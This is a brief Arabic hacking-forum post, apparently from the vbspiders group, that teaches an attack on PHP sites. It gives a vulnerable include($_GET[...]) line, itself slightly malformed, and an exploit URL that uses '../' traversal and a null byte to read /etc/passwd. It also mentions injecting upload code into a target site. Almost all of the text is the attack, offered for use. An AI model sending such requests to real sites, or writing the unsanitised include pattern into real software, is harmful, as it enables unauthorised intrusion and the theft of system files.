السلام عليكم ورحمة الله تعالى وبركاته
تغرة حقن اكواد php صعب تلقاها، بس المهم رح نحاول نشرحها ..
الفكره انها تمكن المخترق من حقن اكواد php داخل الموقع المستهدف، يعني يمكن ان نقوم بحقن كود مركز تحميل او ما الى ذلك ... المهم
حقن دالة include() :
كود PHP:
<?php include($_GET["$include"]) ?>
الاستغلال :
كود PHP:
www.site.com/load.php?include=../../../etc/passwd%00
والسلام عليكم.
@vbspiders team
PHP Code Injection Attack fsd' >>